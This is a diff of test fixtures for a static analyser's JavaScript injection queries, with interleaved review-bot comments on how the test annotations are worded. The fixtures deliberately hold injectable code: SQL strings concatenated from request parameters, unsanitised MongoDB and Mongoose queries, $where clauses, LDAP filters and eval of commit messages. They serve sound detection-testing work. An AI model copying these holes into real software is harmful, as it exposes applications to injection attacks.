@@ -24,15 +24,15 @@ app.post('/documents/find', (req, res) => { const query = JSON.parse(req.query.data); if (checkSchema(query)) { - doc.find(query); // OK + doc.find(query); } if (ajv.validate(schema, query)) { - doc.find(query); // OK + doc.find(query); } if (validate(query)) { - doc.find(query); // NOT OK - validate() doesn't sanitize + doc.find(query); // $ Alert - validate() doesn't sanitize } - doc.find(query); // NOT OK + doc.find(query); // $ Alert }); }); @@ -50,15 +50,15 @@ app.post('/documents/insert', (req, res) => { const query = JSON.parse(req.query.data); const validate = joiSchema.validate(query); if (!validate.error) { - doc.find(query); // OK + doc.find(query); } else { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } try { await joiSchema.validateAsync(query); - doc.find(query); // OK - but still flagged [INCONSISTENCY] + doc.find(query); // $ SPURIOUS: Alert } catch (e) { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js index bc21bb58f4a8..e07fa929063c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js @@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => { conditions.push(`version = ${version}`) } - new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // OK + new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); }); function validVersion(version) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js index 9502cace21a8..c3a3eb840aef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js 
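Review bot: The `// $ SPURIOUS: Alert` after `await joiSchema.validateAsync(query);` in the `@@ -50,15 +50,15 @@` hunk drops the old explanation (`OK - but still flagged`), whereas the other SPURIOUS markers in this patch keep the reason the call is considered safe. Suggest `doc.find(query); // $ SPURIOUS: Alert - only reached when validateAsync() did not throw`, which is what the surrounding try/catch shows. Without it, a reader cannot tell this validated branch apart from the `catch` branch, which is a genuine `// $ Alert`. The handler starts outside the hunk.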
@@ -25,18 +25,18 @@ const server = http.createServer((req, res) => { filter: `(|(name=${username})(username=${username}))`, }; - client.search("o=example", opts1, function (err, res) {}); // NOT OK + client.search("o=example", opts1, function (err, res) {}); // $ Alert client.search( "o=example", - { filter: `(|(name=${username})(username=${username}))` }, // NOT OK + { filter: `(|(name=${username})(username=${username}))` }, // $ Alert function (err, res) {} ); - // GOOD + client.search( "o=example", - { // OK + { filter: `(|(name=${sanitizeInput(username)})(username=${sanitizeInput( username )}))`, @@ -44,7 +44,7 @@ const server = http.createServer((req, res) => { function (err, res) {} ); - // GOOD (https://github.com/ldapjs/node-ldapjs/issues/181) + // OK - https://github.com/ldapjs/node-ldapjs/issues/181 let f = new OrFilter({ filters: [ new EqualityFilter({ @@ -63,9 +63,9 @@ const server = http.createServer((req, res) => { const parsedFilter = ldap.parseFilter( `(|(name=${username})(username=${username}))` ); - client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // NOT OK + client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // $ Alert - const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // NOT OK + const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // $ Alert }); server.listen(389, () => {}); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js index 9b6d9b2fb88a..a1fd044b84aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js 
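Review bot: The sanitized `client.search` call in the first hunk loses both of its markers: `// GOOD` becomes an otherwise empty added line and `{ // OK` becomes a bare `{`. The next hunk of the same file does the opposite and rewrites its `// GOOD (...)` comment to `// OK - ...`. After this change nothing in the fixture says that `sanitizeInput(username)` is the intended safe way to build the LDAP filter, which is the one negative case that separates it from the flagged calls above. I would keep a marker in the same style as the second hunk, e.g. `// OK - username passes through sanitizeInput()`, and drop the empty added line.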
@@ -10,6 +10,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - db.myDoc.find(query, (err, data) => {}); + db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js index 0ebbb3d8a71a..31eea4ddef3a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js @@ -12,6 +12,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query, (err, data) => {}); + doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js index c2fe712e848c..a04855a27957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js @@ -14,6 +14,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js index fc786da87ab0..c557845f7525 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js 
@@ -14,22 +14,20 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value - // OK: user-data is coerced to a string + // OK - user-data is coerced to a string doc.find({ title: '' + query.body.title }); - // OK: throws unless user-data is a string + // OK - throws unless user-data is a string doc.find({ title: query.body.title.substr(1) }); let title = req.body.title; if (typeof title === "string") { - // OK: input checked to be a string + // OK - input checked to be a string doc.find({ title: title }); - // NOT OK: input is parsed as JSON after string check - doc.find({ title: JSON.parse(title) }); + doc.find({ title: JSON.parse(title) }); // $ Alert - input is parsed as JSON after string check } }); }); @@ -39,7 +37,7 @@ app.get('/:id', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); }); @@ -50,8 +48,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); @@ -61,8 +58,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, client) => { let doc = client.db("MASTER").collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); 
@@ -73,16 +69,14 @@ app.post("/logs/count-by-tag", (req, res) => { client .db(process.env.DB_NAME) .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); let importedDbo = require("./dbo.js"); importedDbo .db() .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); @@ -94,7 +88,7 @@ function useParams(params) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); } @@ -108,7 +102,6 @@ function useQuery(queries) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js index 61a87bfaa5ad..1aeb6f50c04a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js @@ -14,7 +14,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: req.body is safe + // OK - req.body is safe doc.find(query); }); }); 
@@ -25,7 +25,6 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: regardless of body parser, query value is still tainted - doc.find(query); + doc.find(query); // $ Alert - regardless of body parser, query value is still tainted }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js index 3092a60b2cd2..d379534cd9bd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js 
@@ -20,83 +20,69 @@ app.post('/documents/find', (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - Document.aggregate([query]); + Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.count(query); + Document.count(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteMany(query); + Document.deleteMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteOne(query); + Document.deleteOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.distinct('type', query); + Document.distinct('type', query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOne(query); + Document.findOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndDelete(query); + Document.findOneAndDelete(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndRemove(query); + Document.findOneAndRemove(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndUpdate(query); + Document.findOneAndUpdate(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - 
Document.replaceOne(query); + Document.replaceOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.update(query); + Document.update(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateMany(query); + Document.updateMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateOne(query).then(X); + Document.updateOne(query).then(X); // $ Alert - query is tainted by user-provided object value - Document.findByIdAndUpdate(X, query, function(){}); // NOT OK + Document.findByIdAndUpdate(X, query, function(){}); // $ Alert - new Mongoose.Query(X, Y, query) // NOT OK - .and(query, function(){}) // NOT OK + new Mongoose.Query(X, Y, query) // $ Alert + .and(query, function(){}) // $ Alert ; - Document.where(query) // NOT OK - `.where()` on a Model. - .where(query) // NOT OK - `.where()` on a Query. - .and(query) // NOT OK - .or(query) // NOT OK - .distinct(X, query) // NOT OK - .comment(query) // OK - .count(query) // NOT OK + Document.where(query) // $ Alert - `.where()` on a Model. + .where(query) // $ Alert - `.where()` on a Query. 
+ .and(query) // $ Alert + .or(query) // $ Alert + .distinct(X, query) // $ Alert + .comment(query) + .count(query) // $ Alert .exec() ; - Mongoose.createConnection(X).count(query); // OK (invalid program) - Mongoose.createConnection(X).model(Y).count(query); // NOT OK - Mongoose.createConnection(X).models[Y].count(query); // NOT OK - - Document.findOne(X, (err, res) => res.count(query)); // NOT OK - Document.findOne(X, (err, res) => err.count(query)); // OK - Document.findOne(X).exec((err, res) => res.count(query)); // NOT OK - Document.findOne(X).exec((err, res) => err.count(query)); // OK - Document.findOne(X).then((res) => res.count(query)); // NOT OK - Document.findOne(X).then(Y, (err) => err.count(query)); // OK - - Document.find(X, (err, res) => res[i].count(query)); // NOT OK - Document.find(X, (err, res) => err.count(query)); // OK - Document.find(X).exec((err, res) => res[i].count(query)); // NOT OK - Document.find(X).exec((err, res) => err.count(query)); // OK - Document.find(X).then((res) => res[i].count(query)); // NOT OK - Document.find(X).then(Y, (err) => err.count(query)); // OK - - Document.count(X, (err, res) => res.count(query)); // OK (res is a number) + Mongoose.createConnection(X).count(query); // OK - invalid program + Mongoose.createConnection(X).model(Y).count(query); // $ Alert + Mongoose.createConnection(X).models[Y].count(query); // $ Alert + + Document.findOne(X, (err, res) => res.count(query)); // $ Alert + Document.findOne(X, (err, res) => err.count(query)); + Document.findOne(X).exec((err, res) => res.count(query)); // $ Alert + Document.findOne(X).exec((err, res) => err.count(query)); + Document.findOne(X).then((res) => res.count(query)); // $ Alert + Document.findOne(X).then(Y, (err) => err.count(query)); + + Document.find(X, (err, res) => res[i].count(query)); // $ Alert + Document.find(X, (err, res) => err.count(query)); + Document.find(X).exec((err, res) => res[i].count(query)); // $ Alert + Document.find(X).exec((err, res) => 
err.count(query)); + Document.find(X).then((res) => res[i].count(query)); // $ Alert + Document.find(X).then(Y, (err) => err.count(query)); + + Document.count(X, (err, res) => res.count(query)); // OK - res is a number function innocent(X, Y, query) { // To detect if API-graphs were used incorrectly. return new Mongoose.Query("constant", "constant", "constant"); 
@@ -108,31 +94,31 @@ app.post('/documents/find', (req, res) => { } var C = getQueryConstructor(); - new C(X, Y, query); // NOT OK + new C(X, Y, query); // $ Alert - Document.findOneAndUpdate(X, query, function () { }); // NOT OK + Document.findOneAndUpdate(X, query, function () { }); // $ Alert let id = req.query.id, cond = req.query.cond; - Document.deleteMany(cond); // NOT OK - Document.deleteOne(cond); // NOT OK - Document.geoSearch(cond); // NOT OK - Document.remove(cond); // NOT OK - Document.replaceOne(cond, Y); // NOT OK - Document.find(cond); // NOT OK - Document.findOne(cond); // NOT OK - Document.findById(id); // NOT OK - Document.findOneAndDelete(cond); // NOT OK - Document.findOneAndRemove(cond); // NOT OK - Document.findOneAndUpdate(cond, Y); // NOT OK - Document.update(cond, Y); // NOT OK - Document.updateMany(cond, Y); // NOT OK - Document.updateOne(cond, Y); // NOT OK - Document.find({ _id: id }); // NOT OK - Document.find({ _id: { $eq: id } }); // OK + Document.deleteMany(cond); // $ Alert + Document.deleteOne(cond); // $ Alert + Document.geoSearch(cond); // $ Alert + Document.remove(cond); // $ Alert + Document.replaceOne(cond, Y); // $ Alert + Document.find(cond); // $ Alert + Document.findOne(cond); // $ Alert + Document.findById(id); // $ Alert + Document.findOneAndDelete(cond); // $ Alert + Document.findOneAndRemove(cond); // $ Alert + Document.findOneAndUpdate(cond, Y); // $ Alert + Document.update(cond, Y); // $ Alert + Document.updateMany(cond, Y); // $ Alert + Document.updateOne(cond, Y); // $ Alert + Document.find({ _id: id }); // $ Alert + Document.find({ _id: { $eq: id } }); if (Mongoose.Types.ObjectId.isValid(query)) { Document.findByIdAndUpdate(query, X, function(){}); // OK - is sanitized } else { - Document.findByIdAndUpdate(query, X, function(){}); // NOT OK + Document.findByIdAndUpdate(query, X, function(){}); // $ Alert } }); 
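Review bot: `Document.find({ _id: { $eq: id } });` loses its `// OK` in this hunk, although `// OK - is sanitized` on the `ObjectId.isValid` branch a few lines below is kept. Together with the preceding `Document.find({ _id: id }); // $ Alert` it is the pair that shows the mitigation: wrapping the user-controlled value in `$eq` keeps it from being interpreted as a query-operator object. A short explanation would keep that readable, e.g. `// OK - $eq compares against the value literally`. The enclosing route handler starts outside the hunk.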
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js index a340bf2d968b..ea469f73ea3b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js @@ -19,7 +19,6 @@ app.get('/documents/find', (req, res) => { const query = {}; query.title = JSON.parse(req.query.data).title; - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js index f26ab52e7078..24aa90a9f735 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js @@ -8,7 +8,7 @@ app.use(bodyParser.json()); app.post('/find', (req, res) => { let v = JSON.parse(req.body.x); - MyModel.find({ id: v }); // NOT OK - MyModel.find({ id: req.body.id }); // NOT OK - MyModel.find({ id: `${req.body.id}` }); // OK + MyModel.find({ id: v }); // $ Alert + MyModel.find({ id: req.body.id }); // $ Alert + MyModel.find({ id: `${req.body.id}` }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js index de328fb49fae..29c21a4f3b49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js 
@@ -6,17 +6,17 @@ app.get("search", function handler(req, res) { let temp = req.params.value; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ?', // OK + sql: 'SELECT * FROM `books` WHERE `author` = ?', values: [temp] }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { - connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert function(error, results, fields) {}); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts index eaf46ad8cf85..03ad4e789653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts @@ -5,7 +5,7 @@ export class Foo { onRequest(req, res) { let taint = req.params.x; - this.db.one(taint); // NOT OK + this.db.one(taint); // $ Alert res.end(); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index d3f190dd1980..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js 
@@ -6,61 +6,61 @@ require('express')().get('/foo', (req, res) => { var query = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - db.any(query); // NOT OK - db.many(query); // NOT OK - db.manyOrNone(query); // NOT OK - db.map(query); // NOT OK - db.multi(query); // NOT OK - db.multiResult(query); // NOT OK - db.none(query); // NOT OK - db.one(query); // NOT OK - db.oneOrNone(query); // NOT OK - db.query(query); // NOT OK - db.result(query); // NOT OK + db.any(query); // $ Alert + db.many(query); // $ Alert + db.manyOrNone(query); // $ Alert + db.map(query); // $ Alert + db.multi(query); // $ Alert + db.multiResult(query); // $ Alert + db.none(query); // $ Alert + db.one(query); // $ Alert + db.oneOrNone(query); // $ Alert + db.query(query); // $ Alert + db.result(query); // $ Alert db.one({ - text: query // NOT OK + text: query // $ Alert }); db.one({ - text: 'SELECT * FROM news where id = $1', // OK - values: req.params.id, // OK + text: 'SELECT * FROM news where id = $1', + values: req.params.id, }); db.one({ text: 'SELECT * FROM news where id = $1:raw', - values: req.params.id, // NOT OK - interpreted as raw parameter + values: req.params.id, // $ Alert - interpreted as raw parameter }); db.one({ text: 'SELECT * FROM news where id = $1^', - values: req.params.id, // NOT OK + values: req.params.id, // $ Alert }); db.one({ text: 'SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3', values: [ - req.params.id, // NOT OK - req.params.name, // NOT OK + req.params.id, // $ Alert + req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - not using raw interpolation } }); db.one({ text: "SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE \"%${title}:value%\"", 
values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - :value cannot break out of single quotes - title: req.params.title, // NOT OK - enclosed by wrong type of quote + title: req.params.title, // $ Alert - enclosed by wrong type of quote } }); db.task(t => { - return t.one(query); // NOT OK + return t.one(query); // $ Alert }); db.taskIf( - { cnd: t => t.one(query) }, // NOT OK - t => t.one(query) // NOT OK + { cnd: t => t.one(query) }, // $ Alert + t => t.one(query) // $ Alert ); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js index 44a628a3c9e8..f5ca83ef1bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js 
@@ -7,47 +7,47 @@ const app = Express(); app.use(require('body-parser').json()); app.post('/documents/find', (req, res) => { - client.set(req.body.key, "value"); // NOT OK + client.set(req.body.key, "value"); // $ Alert var key = req.body.key; if (typeof key === "string") { - client.set(key, "value"); // OK + client.set(key, "value"); client.set(["key", "value"]); } - client.set(key, "value"); // NOT OK - client.hmset("key", "field", "value", key, "value2"); // NOT OK + client.set(key, "value"); // $ Alert + client.hmset("key", "field", "value", key, "value2"); // $ Alert // chain commands client .multi() .set("constant", "value") - .set(key, "value") // NOT OK - .get(key) // OK + .set(key, "value") // $ Alert + .get(key) .exec(function (err, replies) { }); client.duplicate((err, newClient) => { - newClient.set(key, "value"); // NOT OK + newClient.set(key, "value"); // $ Alert }); - client.duplicate().set(key, "value"); // NOT OK + client.duplicate().set(key, "value"); // $ Alert }); import { promisify } from 'util'; app.post('/documents/find', (req, res) => { const key = req.body.key; - client.set(key, "value"); // NOT OK + client.set(key, "value"); // $ Alert const setAsync = promisify(client.set).bind(client); - const foo1 = setAsync(key, "value"); // NOT OK + const foo1 = setAsync(key, "value"); // $ Alert client.setAsync = promisify(client.set); - const foo2 = client.setAsync(key, "value"); // NOT OK + const foo2 = client.setAsync(key, "value"); // $ Alert client.unrelated = promisify(() => {}); - const foo3 = client.unrelated(key, "value"); // OK + const foo3 = client.unrelated(key, "value"); const unrelated = promisify(client.foobar).bind(client); - const foo4 = unrelated(key, "value"); // OK + const foo4 = unrelated(key, "value"); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js index b28ddabc9ca6..c68c7d295ca7 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js @@ -3,8 +3,7 @@ const sql = require('mssql'); var app = express(); app.get('/post/:id', async function(req, res) { - // OK + sql.query`select * from mytable where id = ${req.params.id}`; - // NOT OK - new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); + new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js index 3f9aa21355d1..99c6869a5110 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js @@ -6,11 +6,11 @@ const pool = new pg.Pool(config); function handler(req, res) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - pool.query(query1, [], function(err, results) { // BAD: the category might have SQL special characters in it + pool.query(query1, [], function(err, results) { // $ Alert - the category might have SQL special characters in it // process results }); - // GOOD: use parameters + // OK - use parameters var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1" + " ORDER BY PRICE"; pool.query(query2, [req.params.category], function(err, results) { diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js index 6facf5ec75a5..0aeb77af5a20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js 
@@ -14,12 +14,12 @@ app.post("/documents/find", (req, res) => { MongoClient.connect("mongodb://localhost:27017/test", (err, db) => { let doc = db.collection("doc"); - doc.find(query); // NOT OK, but that is flagged by js/sql-injection [INCONSISTENCY] - doc.find({ $where: req.body.query }); // NOT OK - doc.find({ $where: "name = " + req.body.name }); // NOT OK + doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection + doc.find({ $where: req.body.query }); // $ Alert[js/code-injection] + doc.find({ $where: "name = " + req.body.name }); // $ Alert[js/code-injection] function mkWhereObj() { - return { $where: "name = " + req.body.name }; // NOT OK + return { $where: "name = " + req.body.name }; // $ Alert[js/code-injection] } doc.find(mkWhereObj()); // the alert location is in mkWhereObj. diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js index df5cd88971a3..62158678073c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js @@ -1,5 +1,5 @@ const github = require('@actions/github'); function test() { - eval(github.context.payload.commits[1].message); // NOT OK + eval(github.context.payload.commits[1].message); // $ Alert[js/code-injection] } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js index 658d71e4c879..fb28264b5cec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js 
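Review bot: `doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection` records the line as a known false negative, yet its own explanation says the finding is reported by a different query, which reads as intended behaviour for this directory rather than a gap. It is also the only untagged marker in the hunk; the `$where` lines all use `Alert[js/code-injection]`, so it is unclear which query is expected to report it. If no code-injection alert is intended here, a plain comment such as `// OK for js/code-injection - reported by js/sql-injection` states that without registering a missing result. Otherwise the marker should carry the query id, presumably `// $ MISSING: Alert[js/code-injection]`.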
@@ -1,66 +1,66 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on(location.search); // OK + $scope.$on(location.search); }) .controller('MyController', function($scope) { - $scope.$apply('hello'); // OK + $scope.$apply('hello'); }) .controller('MyController', function($scope) { var scope = $scope; - scope.$apply(location.search); // BAD + scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$apply(location.search); // BAD + $scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$applyAsync(location.search); // BAD + $scope.$applyAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$eval(location.search); // BAD + $scope.$eval(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$evalAsync(location.search); // BAD + $scope.$evalAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watch(location.search); // BAD + $scope.$watch(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchCollection(location.search); // BAD + $scope.$watchCollection(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchGroup(location.search); // BAD + $scope.$watchGroup(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile('hello'); // OK + $compile('hello'); }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) 
